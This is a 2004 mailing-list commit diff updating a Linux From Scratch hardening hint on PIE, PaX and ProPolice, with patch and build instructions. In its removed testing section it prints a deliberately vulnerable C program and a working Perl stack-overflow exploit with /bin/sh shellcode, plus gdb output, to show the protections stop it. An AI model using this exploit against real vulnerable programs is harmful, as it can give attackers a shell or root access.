cvs commit: hints winter.txt

tushar at linuxfromscratch.org tushar at linuxfromscratch.org
Tue Feb 3 14:18:58 PST 2004


tushar      04/02/03 15:18:58

  Modified:    .        winter.txt
  Log:
  Updated: winter.txt
  
  Revision  Changes    Path
  1.4       +122 -537  hints/winter.txt
  
  Index: winter.txt
  ===================================================================
  RCS file: /home/cvsroot/hints/winter.txt,v
  retrieving revision 1.3
  retrieving revision 1.4
  diff -u -u -r1.3 -r1.4
  --- winter.txt	17 Jan 2004 03:27:09 -0000	1.3
  +++ winter.txt	3 Feb 2004 22:18:58 -0000	1.4
  @@ -1,23 +1,26 @@
   AUTHOR: Robert Connolly <cendres at videotron dot ca> (ashes)
   
  -DATE:   2003-12-25
  +DATE:   2004-02-02
   
   LICENSE:        Public Domain
   
  -SYNOPSIS:       ProPolice + Libsafe + Pax + PIE
  +SYNOPSIS:       Position independent executables + Pax
   
   PRIMARY URL:	ftp://twocents.mooo.com/pub/
   
   DESCRIPTION:
  -ProPolice is a C and C++ security extension for GCC.
  -Libsafe is a preloaded library that prevents dangerous functions from being
  -executed by applications.
  -Pax is a kernel patch which adds obscurity and lessens the vulnerability of
  -attacks.
  -PIE is a gcc-3.4 back port to enable Position Independent Executables, which
  -takes advantage of Pax.
  -The combination of these provide powerful security features in the tool chain.
  -All of the above can work independently of each other.
  +Experimental
  +Position independent executables (pie) is the superset of position independent
  +code (pic). Pie will be formally available with gcc-3.4, this hint uses the
  +original patch which made it in gcc-3.4. This provides extra security features
  +that can be used by Pax/Grsecurity, exec-shield, and others. It is also a good
  +idea to use ProPolice together with this even though there is overlapping
  +functionality.
  +
  +http://gcc.gnu.org/ml/gcc-patches/2003-06/msg00140.html
  +http://pax.grsecurity.net/
  +http://www.grsecurity.net/
  +http://people.redhat.com/mingo/exec-shield/
   
   PREREQUISITES: LFS-5.0
   
  @@ -28,10 +31,6 @@
   =======
   
   	Introduction
  -		ProPolice
  -		Libsafe
  -		Pax
  -		Pie
   	Downloads
   	Installation
   	Testing
  @@ -41,563 +40,153 @@
   ============
   Introduction
   ============
  -On my desktop, 800MHz Duron 512MB ram, I get one gcc error total from following
  -this hint.
  -The cvs LFS book is recommended at this time.
  -
  -----------------------------------
  -ProPolice Smashing Stack Protector
  -----------------------------------
  --The good news:
  -
  -Based on StackGaurd, ProPolice was developed by IBM for protecting applications
  -from stack smashing attacks. This is the single largest class of attacks and
  -many hope ProPolice will find its way into the mainstream GCC and become the
  -default smash guard. This protection uses the urandom device to determine the
  -guard value, and uses minimal time and space overhead. In practice users do not
  -complain about loss in system performance even when the entire system is build
  -with this guard.
  -
  -The patch will add -fstack-protector-all, -fstack-protector, and
  --fno-stack-protector to GCC extensions for C and C++; and
  -__guard_setup and __stack_smash_handler are defined in libgcc2.c. It is
  -recommended the entire system be built with -fstack-protector, with the
  -exception of Grub. Programs compiled with this which are run in chroot will
  -need access to /dev/urandom and for logging /dev/log. Syslog puts it in
  -/var/log/sys.log where intrusion detection can use it.
  -I have tested ProPolice on kernel 2.4 and 2.6, and libc linuxthreads and nptl.
  -It should work with any custom configuration you may have.
  -
  --The bad news:
  -
  -ProPolice assumes only character arrays are dangerous, and does not protect
  -arrays of length 7 or less. ProPolice does nothing to protect the heap.
  -Optimizing more then -O2 may optimize away things ProPolice needs.
  +Follow the cvs book with this hint. Unfortunately -fpie is slightly broken in
  +the glibc-2.3.3 that is in the LFS cvs book. I tested this against 
  +glibc-2.3-20040129. You also need a binutils that understands -pie, either HJL,
  +or FSF-cvs. If you use FSF-cvs binutils you will have to comment out the sanity
  +code in glibc/configure. grep -n -e "too old" configure, and comment out the
  +whole test. HJL should work without that hassle. I don't have a relro patch for
  +FSF binutils yet either, so HJL is reccommended.
   
  -You can expect one error from gcc3 test suite.
  -FAIL: gcc.dg/asm-names.c (test for excess errors)
  +=========
  +Downloads
  +=========
  +-----
  +Glibc
  +-----
  +Thanks to Teemu Tervo nptl hint. This shouldn't be nessesary soon.
  +
  +cvs -d :pserver:anoncvs at sources.redhat.com:/cvs/glibc -z3 co libc
  +mv libc glibc-2.3-`date +%Y%m%d`
  +tar cjf glibc-2.3-`date +%Y%m%d`.tar.bz2 glibc-2.3-`date +%Y%m%d`
  +rm -rf glibc-2.3-`date +%Y%m%d
  +
  +Glibc uses an executable stack in ld.so. To use Pax you will need this patch.
  +http://csociety-ftp.ecn.purdue.edu/pub/gentoo-portage/ \
  +	sys-libs/glibc/files/2.3.3/glibc-2.3.3-dl_execstack-PaX-support.patch
  +http://www.linuxfromscratch.org/patches/downloads/glibc/ \
  +	glibc-2.3.3-dl_execstack-PaX-support-1.patch
  +ftp://twocents.mooo.com/pub/hcc/pie/glibc-2.3.3-dl_execstack-PaX-support-1.patch
  +
  +This gives us Pax friendly behaviour from iconvconfig. I don't think its completely
  +nessesary. (works on gcc-2.3.3 too)
  +http://mirror.calvin.edu/gentoo/gentoo-portage/sys-libs/glibc/files/ \
  +	2.3.2/glibc-2.3.2-iconvconfig-name_insert.patch
  +ftp://twocents.mooo.com/pub/hcc/pie/glibc-2.3.2-iconvconfig-name_insert.patch
  +
  +This is pt_gnu support for Pax. Needed to use softmode, will become obligatory
  +eventualy.
  +http://mirror.calvin.edu/gentoo/gentoo-portage/sys-libs/glibc/files/ \
  +	2.3.3/glibc-2.3.3_pre20040117-pt_pax.diff
  +ftp://twocents.mooo.com/pub/hcc/pie/glibc-2.3.3_pre20040117-pt_pax.diff
   
   --------
  -Libsafe
  +Binutils
   --------
  --The good news:
  +HJL
  +ftp://ftp.kernel.org/pub/linux/devel/binutils/binutils-2.14.90.0.8.tar.bz2
   
  -Libsafe was developed by Avaya Labs to protect against format string
  -vulnerabilities. Though not widely used it has been widely tested. This
  -protection can be installed on an already running system, using ld.so.preload
  -to watch applications at runtime for functions which are known to be vulnerable.
  -This of course only protects dynamically linked applications. There should not
  -be a noticeable performance decrease, and it also logs to syslog.
  -
  --The bad news:
  -
  -We get some errors if we install Libsafe early in the build.
  -From gcc3
  -FAIL: g++.dg/expr/anew1.C execution test
  -FAIL: g++.dg/expr/anew2.C execution test
  -FAIL: g++.dg/expr/anew3.C execution test
  -FAIL: g++.dg/expr/anew4.C execution test
  -
  -From binutils
  -FAIL: S-records
  -FAIL: S-records with constructors
  -
  -To avoid these errors we install Libsafe after gcc in chapter 6.
  -Other bad news is unknown.
  -
  -----
  -Pax
  -----
  --The good news:
  -TODO
  --The bad news:
  -This hint does not use any enforcement.
  -Unknown
  +This patch combines 3 patches temporarily. When 2.14.90.0.9 is released we will only
  +need to patch the pt_pax portion. I think I forgot to mention this hint is bleeding
  +edge :)
  +ftp://twocents.mooo.com/pub/hcc/pie/ \
  +	binutils-2.14.90.0.8-pt_pax-eh_frame-relro-1.patch
   
   ----
   PIE
   ----
  --The good news:
  -TODO
  --The bad news:
  -This currently only works using a gcc-3.4 back port. It also needs Glibc-2.3.3
  -(cvs) to work.
  -This also requires a binutils which understands -pie.
  -X, kde, and others, do not like building with gcc -pie. They can still be
  -installed without -pie, for now.
  -
  -=========
  -Downloads
  -=========
  -----------
  -ProPolice
  -----------
  -ftp://twocents.mooo.com/pub/
  -
  -Patches are available for GCC 2.95.3, 3.3.1, and 3.3.2.
  -The protector_only patches will make GCC use -fstack-protector all the time.
  -http://www.linuxfromscratch.org/patches/downloads/gcc/ \
  -        gcc-{$ver}-protector-2.patch
  +Only need one on these.
  +http://cvs.mandrakesoft.com/cgi-bin/cvsweb.cgi/~checkout~/ \
  +        SPECS/gcc/gcc33-pie.patch
   http://www.linuxfromscratch.org/patches/downloads/gcc/ \
  -        gcc-{$ver}-protector_only-2.patch
  -
  -This patch enables the kernel to be built with -fstack-protector.
  -http://www.linuxfromscratch.org/patches/downloads/linux/ \
  -	linux-2.4.23-protector-1.patch
  -or
  -	linux-2.6.0-protector-1.patch
  -
  -Use this patch when building xfree86. It will use -fno-stack-protector when
  -building modules.
  -http://www.linuxfromscratch.org/patches/downloads/XFree86/ \
  -        XFree86-4.3.0-protector-1.patch
  -
  ---------
  -Libsafe
  ---------
  -Official site:
  -http://www.research.avayalabs.com/project/libsafe/src/libsafe-2.0-16.tgz
  -My mirror:
  -http://www.topside.org/~ashes/files/libsafe/libsafe-2.0-16.tgz
  +        gcc-3.3-pie-1.patch
  +ftp://twocents.mooo.com/pub/hcc/pie/gcc-3.3-pie-2.patch
   
   ----
   Pax
   ----
  -http://www.linuxfromscratch.org/patches/downloads/linux/ \
  -	linux-2.4.23-pax-1.patch
  -Official site:
  -http://pageexec.virtualave.net/ \
  -	pax-linux-2.4.23-200312021730.patch
  -http://cr0.org/aslr26/aslr26-linux-2.6.0-test9-200310272244.patch
  -My mirror:
  -http://www.topside.org/~ashes/files/pax/ \
  -	linux-2.4.23-pax-1.patch
  -http://www.topside.org/~ashes/files/pax/mirror/ \
  -	aslr26-linux-2.6.0-test9-200310272244.patch
  +Kernel 2.4
  +http://pax.grsecurity.net/pax-linux-2.4.23-200401091805.patch
   
  -This is an information leak patch. Its not available for 2.4.23 or 2.6.0 yet :(
  +Kernel 2.6
  +http://pax.grsecurity.net/pax-linux-2.6.1-200401091905.patch
  +
  +This is an information leak patch. Its not available for 2.6 yet :(
   http://cr0.org/pax-obscure/pax+obs-linux-2.4.22-200308302223.tar.gz
   
   ----
  -PIE
  +HGCC
   ----
  -http://www.linuxfromscratch.org/patches/downloads/gcc/ \
  -	gcc-3.3.2-pie-1.patch
  -For Gcc 3.3 and 3.3.1
  -	gcc-3.3-pie-1.patch
  -My mirror:
  -http://www.topside.org/~ashes/files/pax/gcc-3.3.2-pie-1.patch
  -http://www.topside.org/~ashes/files/pax/gcc-3.3-pie-1.patch
  -
  ---------------------
  -Full Bounds Checking
  ---------------------
  -This is an auditing tool to give verbose debugging. Applications built with this
  -will run like a pig. This is not intended for real world use, only for
  -debugging. -fbounds-checking is added to GCC extensions, and is not used by
  -default.
  -Official site:
  -http://web.inter.nl.net/hcc/Haj.Ten.Brugge/ \
  -	bounds-checking-gcc-3.3.2-1.00.patch.bz2
  -My mirror:
  -http://www.topside.org/~ashes/files/fbounds/gcc-3.3.2-bounds-checking-1.patch
  -or
  -http://www.topside.org/~ashes/files/fbounds/gcc-3.3.2-bounds-plus-pie-1.patch
  -
  ----------------------
  -Binutils-2.14.90.0.7
  ----------------------
  -You only need this for PIE.
  -ftp://ftp.kernel.org/pub/linux/devel/binutils/
  -
  -----------
  -Glibc-cvs
  -----------
  -# You only need this for PIE.
  -# Like the nptl hint shows. Get Glibc-cvs like this.
  -cvs -d :pserver:anoncvs at sources.redhat.com:/cvs/glibc -z3 co libc &&
  -mv libc glibc-2.3-`date +%Y%m%d` &&
  -tar cjf glibc-2.3-`date +%Y%m%d`.tar.bz2 glibc-2.3-`date +%Y%m%d` &&
  -rm -rf glibc-2.3-`date +%Y%m%d`
  +This is a specs file editor for changing the default behavior of gcc to use
  +-fpie and -ftack-protector-all. Check for newer versions. If anyone wants to
  +write this script better email me. hgcc3 has added ld -z relro and combreloc.
  +ftp://twocents.mooo.com/pub/hcc/hgcc3.sh
   
   =====================
   Installation
   =====================
  -ProPolice and Libsafe can be used effectively on LFS-5.0. If you want to use PIE
  -you need to get a copy of glibc-2.3.3-cvs, and binutils-2.14.90.0.7 or later.
  -
   ---------
   Chapter 5
   ---------
    - Binutils
  -Install binutils-2.14.90.0.7 just like the book says.
  -Bison, m4, and flex need to be installed in chapter 5 to satisfy this version of
  -Binutils.
  -
  - - GCC pass 1
  -If this is your second round with ProPolice, and the host system is running
  -protector_only, you can use the protector_only patch in GCC pass 1. If it's your
  -second round with PIE, you can use the PIE patch in gcc pass 1 also.
  -The old version of this hint used a move to glibc patch which I have removed. I
  -don't think its necessary. In order to escape it do not patch at this stage,
  -prepend CFLAGS="-fno-stack-protector -O2" to configure, and append it to make.
  -This will work out after glibc is installed.
  +Use this everytime you build binutils.
  +patch -Np1 -i ../binutils-2.14.90.0.8-pt_pax-eh_frame-relro-1.patch
  +
  +Before make check do hgcc -r. After make check do hgcc -pa-fpie
  +Repeat this for any binutils make check. No other packages are known to have
  +issues like this.
   
    - Glibc-cvs
  -No need for the scanf patch with glibc-cvs. Add --enable-add-ons=linuxthreads to
  -configure. This also works with nptl. Make check should pass with no errors. If
  -you have Libsafe on the host system you might want to remove "/lib/libsafe.so.2"
  -from /etc/ld.so.preload just for glibc, and add it back after glibc is
  -installed. This is not because of a Libsafe violation, but Libsafe will cause
  -the glibc build to fail.
  -Bug: Glibc doesn't like the Pax randomization durring make or make check. I
  -think I've read about a Pax/Glibc bug on google. For now use a vanilla kernel on
  -the host.
  +If you plan to use the programs in /tools after you reboot, then use the patches
  +from chap6 glibc below.
   
    - GCC pass 2
  -Auditors might want to install gcc-3.3.2-bounds-plus-pie-1.patch, or
  -gcc-3.3.2-bounds-checking-1.patch. The the patch contains instructions about its
  -use. Use the gcc-3.3.2.tar.bz2 tar ball to keep the patch from complaining.
  -The Bounds Checking patch and PIE are merged, if applied separately they
  -conflict on one file. If you're using PIE you should see "checking linker
  -position independent executable support... yes" during configure.
  -
  -patch -Np1 -i ../gcc-3.3.2-protector_only-2.patch
  -patch -Np1 -i ../gcc-3.3.2-pie-1.patch
  -
  - - Binutils pass 2
  -env CFLAGS="-pie -O2" ../binutils-2.14.90.0.7/configure \
  -	 --prefix=/tools --enable-shared --with-lib-path=/tools/lib &&
  -env CFLAGS="-pie -O2" make
  -# There is a ProPolice, and PIE bug in the test suite. Do this to pass the tests.
  -make CFLAGS="-fno-stack-protector -O2" check
  -
  -# And now we have "shared object" because of -pie.
  -$ file /tools/bin/ld
  -/tools/bin/ld: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), not 
  -stripped
  -
  -The easiest thing do to now is this. Or pass env like we did above.
  -This assumes you installed the propolice_only patch.
  -export CFLAGS="-pie -O2"
  -export CXXFLAGS="-pie -O2"
  -
  - - Bzip2
  -cp Makefile Makefile.backup &&
  -sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' Makefile.backup > Makefile &&
  -make OPT="$CFLAGS" PREFIX=/tools install
  -
  - - Perl
  -env LDFLAGS="-pie" ./configure.gnu --prefix=/tools -Dstatic_ext='IO Fcntl'
  -make perl utilities  OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  +patch -Np1 -i ../gcc-3.3-pie-2.patch
   
  -Install the rest of chapter 5, and don't forget to install m4, bison, and flex
  -in /tools.
  + - HGCC
  +cp hgcc3.sh /tools/bin/hgcc
  +chmod +x /tools/bin/hgcc
  +hgcc -pa-fpie
   
   ---------
   Chapter 6
   ---------
    - Glibc
  -With this all your libraries will be shared objects.
  -export CFLAGS="-pie -O2"
  -export CXXFLAGS="-pie -O2"
  +patch -Np1 -i ../glibc-2.3.3-dl_execstack-PaX-support-1.patch
  +patch -Np1 -i ../glibc-2.3.2-iconvconfig-name_insert.patch
  +patch -Np1 -i ../glibc-2.3.3_pre20040117-pt_pax.diff
   
  - - Binutils
  -make CFLAGS="-fno-stack-protector -O2" check
  +Checking for fpie and relro should answer "yes" durring configure.
   
    - GCC
  -patch -Np1 -i ../gcc-3.3.2-protector_only-2.patch
  -patch -Np1 -i ../gcc-3.3.2-pie-1.patch
  -
  - - Libsafe
  -There are tests in the Libsafe source you should look at.
  -make &&
  -make install
  -
  -- Lfs-utils
  -For some reason mktemp wont build as a shared object.
  -
  - - Vim
  -env LDFLAGS="-pie" ./configure...
  -
  - - Less
  -env LDFLAGS="-pie" ./configure...
  -
  - - Net-tools
  -make COPTS="-D_GNU_SOURCE -Wall $CFLAGS" LOPTS="-pie"
  -
  - - Perl
  -env LDFLAGS="-pie" ./configure.gnu --prefix=/usr -Dpager="/bin/less -isR"
  -make OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  -
  - - Bzip2
  -cp Makefile Makefile.backup
  -sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' \
  -Makefile.backup > Makefile
  -cp Makefile-libbz2_so Makefile-libbz2_so.backup
  -sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' \
  -Makefile-libbz2_so.backup > Makefile-libbz2_so
  -
  -make -f Makefile-libbz2_so OPT="$CFLAGS"
  -make clean
  -make OPT="$CFLAGS"
  -
  - - Ed
  -env LDFLAGS="-pie" ./configure...
  -
  - - Kbd
  -make CFLAGS="$CFLAGS" LDFLAGS="-pie"
  +patch -Np1 -i ../gcc-3.3-pie-2.patch
   
  - - E2fsprogs
  -make LDFLAGS="-pie"
  + - HGCC
  +cp hgcc3.sh /usr/bin/hgcc
  +chmod +x /usr/bin/hgcc
  +hgcc -pa-fpie
   
    - Grub
  -env CFLAGS="" ./configure --prefix=/usr
  -make CFLAGS=-fno-stack-protector
  +hgcc -r before configure, hgcc -pa-fpie after make install.
   
  - - Man
  -cp man2html/Makefile.in man2html/Makefile.in.backup
  -sed -e "s/CFLAGS = /CFLAGS = -O -pie /" \
  -man2html/Makefile.in.backup > man2html/Makefile.in
  -./configure -default -confdir=/etc
  -make CFLAGS="-O -pie" LDFLAGS="-pie"
  -
  - - Procinfo
  -make LDLIBS=-lncurses CFLAGS="$CFLAGS" LDFLAGS="-pie"
  -
  - - Procps
  -make CC="gcc -fpie"
  -
  - - Sysklogd
  -make RPM_OPT_FLAGS="$CFLAGS" LDFLAGS="-pie"
  -
  - - Sysvinit
  -make -C src CFLAGS="-Wall -D_GNU_SOURCE $CFLAGS" LDFLAGS="-pie"
  -
  - - Util-linux
  -make HAVE_KILL=yes HAVE_SLN=yes LDFLAGS="-pie"
  -
  - - GCC 2.95.3
  -unset CFLAGS CXXFLAGS
  -patch -Np1 -i ../gcc-2.95.3-protector.patch
  + - Util Linux
  +For now pivot_root doesn't build with fpie. Needs investigation, maybe patch.
  +hgcc -r before configure, hgcc -pa-fpie after make install.
   
   ---------
   Chapter 8
   ---------
  -Linux kernel
  + - Linux Kernel
  +patch -Np1 -i ../pax-linux-2.4.23-200401091805.patch
   
  -make mrproper &&
  -patch -Np1 -i ../linux-2.4.23-propolice-1.patch &&
  -patch -Np1 -i ../linux-2.4.23-pax-1.patch
  -
  -make menuconfig
  -
  -Don't use "Enforce non-executable pages" or you wont be able to login after.
  -
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" dep
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" bzImage
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" modules
  -make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" modules_install
  -
  -Try to remember to add -pie to CFLAGS/CXXFLAGS when to install other packages.
  -LDFLAGS too sometimes if needed.
  +I can boot using all the options except:
  +CONFIG_PAX_EMUSIGRT and CONFIG_PAX_NOELFRELOCS
   
   ========
   Testing
   ========
  -
  -## This program overflows the stack.
  -
  -cat > test-propolice.c << "EOF"
  -/* test-propolice.c */
  -
  -#define OVERFLOW "This is longer than 10 bytes"
  -
  -int main (int argc, char *argv[]) {
  -    char buffer[10];
  -    strcpy(buffer, OVERFLOW);
  -    return 0;
  -}
  -EOF
  -
  -# Then compile and run as follows
  -
  -gcc -fstack-protector -o test-propolice test-propolice.c &&
  -./test-propolice
  -
  -# That should return this to show the guard is working.
  -# "stack smashing attack in function main"
  -
  -# You should also see a syslog message similar to this:
  -
  -# test-propolice[19961]: [ID 702911 auth.crit] stack smashing attack in function
  -# main
  -
  -# This program segfaults and the guard ignores it.
  -
  -cat > fail.c << "EOF"
  -#include <stdio.h>
  -#include <unistd.h>
  -
  -int foo(char *blah) {
  -  char buffer[7];
  -  sprintf(buffer, "12345678901234567890123456789012345678901234567890");
  -  return(1234);
  -}
  -
  -int main(int argc, char **argv) {
  -  printf("before foo()\n");
  -  foo("blah");
  -  printf("after foo()\n");
  -}
  -EOF
  -
  -gcc -fstack-protector -o fail fail.c &&
  -./fail
  -
  -# Which should return this.
  -# before foo()
  -# Segmentation fault
  -
  -First we run thise code with no protection.
  -We are using -static so libsafe isn't used.
  -
  -cat > foo.c << "EOF"
  -/* foo.c */
  -
  - #include <stdio.h>
  - int main(int argc, char **argv)
  - {
  - char buffer[180];
  - if(argc>1)
  - strcpy(buffer,argv[1]);
  - printf("Miam...\n");
  - }
  -EOF
  -
  -gcc -fno-stack-protector -static -o foo foo.c
  -
  -cat > x.pl << "EOF"
  -#!/usr/bin/perl
  -
  - ### le shellcode qui execute /bin/sh
  - $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
  - "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
  - "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
  - "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  -
  - ### Return Address / ESP
  - $ret = 0xbffff8a0;
  -
  - ### la taille du buffer
  - $buf = 208;
  -
  - $egg = 2000;
  -
  - $nop = "\x90";
  -
  - $offset = 0;
  -
  - if (@ARGV == 1) { $offset = $ARGV[0]; }
  - $addr = pack('l', ($ret + $offset));
  -
  - for ($i = 0; $i < $buf; $i += 4) {
  - $buffer .= $addr;
  - }
  -
  - for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++){
  - $buffer .= $nop;
  - }
  -
  - $buffer .= $shellcode;
  - exec("./foo", $buffer,0);
  -EOF
  -
  -Install gdb from http://ftp.gnu.org/gnu/gdb/gdb-6.0.tar.gz
  -Run this, add run `perl -e 'print "A"x208'`
  -Look for "esp 0xbffff8a0", you might have to edit x.pl for you.
  -
  -$ gdb foo
  -GNU gdb 6.0
  -Copyright 2003 Free Software Foundation, Inc.
  -GDB is free software, covered by the GNU General Public License, and you are
  -welcome to change it and/or distribute copies of it under certain conditions.
  -Type "show copying" to see the conditions.
  -There is absolutely no warranty for GDB.  Type "show warranty" for details.
  -This GDB was configured as "i686-pc-linux-gnu"...(no debugging symbols found)...
  -(gdb) run `perl -e 'print "A"x208'`
  -Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  -'print "A"x208'`
  -(no debugging symbols found)...(no debugging symbols found)...Miam...
  -
  -Program received signal SIGSEGV, Segmentation fault.
  -0x41414141 in ?? ()
  -(gdb) info reg
  -eax            0x8      8
  -ecx            0x1fc018d2       532682962
  -edx            0x4014fe00       1075117568
  -ebx            0x4014f9e8       1075116520
  -esp            0xbffff8a0       0xbffff8a0
  -ebp            0x41414141       0x41414141
  -esi            0x40015020       1073827872
  -edi            0xbffff8e4       -1073743644
  -eip            0x41414141       0x41414141
  -eflags         0x10246  66118
  -cs             0x23     35
  -ss             0x2b     43
  -ds             0x2b     43
  -es             0x2b     43
  -fs             0x0      0
  -gs             0x0      0
  -(gdb) kill
  -Kill the program being debugged? (y or n) y
  -(gdb) quit
  -
  -$ ./x.pl
  -Miam...
  -sh-2.05b$
  -
  -This only demonstrates that bad code can freak out and exit to a shell.
  -If this code were part of a daemon running as root, or suid, it would give
  -root shell. The exploits in the libsafe source, and paxtest is basicly the
  -same as this. The paxtest ones are the most modern.
  -
  -Now lets try this code with propolice.
  -
  -rm foo && gcc -fstack-protector -static -o foo foo.c
  -gdb foo
  -...
  -run `perl -e 'print "A"x208'`
  -..
  -Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  -'print "A"x208'`
  -(no debugging symbols found)...(no debugging symbols found)...Miam...
  -foo: stack smashing attack in function main
  -Program received signal SIGABRT, Aborted.
  -0x40047b81 in kill () from /lib/libc.so.6
  -(gdb)
  -
  -Here we can see propolice aborted the program, and now ./x.pl also aborts.
  -Next we test libsafe.
  -
  -rm foo && gcc -fno-stack-protector -o foo foo.c
  -
  -$ ./x.pl
  -Libsafe version 2.0.16
  -Detected an attempt to write across stack boundary.
  -Terminating /home/ashes/LFS/propolice/export/20031223/testing/foo.
  -    uid=1001  euid=1001  pid=742
  -Call stack:
  -    0x40018cbc  /lib/libsafe.so.2.0.16
  -    0x40018deb  /lib/libsafe.so.2.0.16
  -    0x80483a2   /home/ashes/LFS/propolice/export/20031223/testing/foo
  -    0x40039a96  /lib/libc-2.3.2.so
  -Overflow caused by strcpy()
  -Killed
  -
  -And now if you want to build the Pax patch into your kernel, reboot,
  -and start again you will notice the first test doesn't work because
  -the return address keeps changing.
  +Download:
  +http://pax.grsecurity.net/paxtest-0.9.5.tar.gz
   
   ========
   Feedback
  @@ -607,24 +196,12 @@
   
   ACKNOWLEDGMENTS:
   
  -* Thanks to Hiroaki Etoh for providing the protector patch to IBM
  -* Thanks to IBM for providing the protector patch at
  -	http://www.research.ibm.com/trl/projects/security/ssp/
  -* Thanks to OpenBSD for their XFree86 code. http://www.openbsd.org/
  -* Thanks to netsys.com for this
  -	http://www.netsys.com/cgi-bin/display_article.cgi?1266
  -* Thanks to securityfocus.com and immunix.com for this
  -	http://www.securityfocus.com/archive/1/333986/2003-08-17/2003-08-23/2
  -* Thanks to adamantix.org for kernel patches. http://www.adamantix.org/
  -* Thanks to Avaya Labs for Libsafe
  -	http://www.research.avayalabs.com/project/libsafe/
  -* Thanks to the Pax Team at http://pageexec.virtualave.net/
  -* Thanks to Teemu Tervo for nptl hint
  -	http://www.linuxfromscratch.org/hints/downloads/files/nptl.txt
  -* Thanks to cross compiling hint
  -	http://www.linuxfromscratch.org/hints/downloads/files/ \
  -		crosscompiling-x86.txt
  -
  +* Thanks to Gnu for the GNU toolchain. http://www.gnu.org/
  +* Thanks to Redhat for contributions to the GNU toolchain.
  +	http://www.redhat.com/
  +* Thanks to the Pax team. http://pax.grsecurity.net/
  +* Thanks to Gentoo and the Hardended Gentoo team for development,
  +  testing, and patches. http://www.gentoo.org/proj/en/hardened/
   
   CHANGELOG:
   [2003-10-18]
  @@ -676,3 +253,11 @@
   [2003-12-25]
   * More cflags.
   * New tests.
  +[2004-02-02]
  +* Update gcc pie patch.
  +* Moved Libsafe and ProPolice to prolice.txt
  +* Added fpie to hgcc2.sh
  +[2004-02-03]
  +* Add gnu_pt patches.
  +* Add ld -z relro support.
  +* Added relro and combreloc to hgcc3.sh
  
  
  



More information about the hints mailing list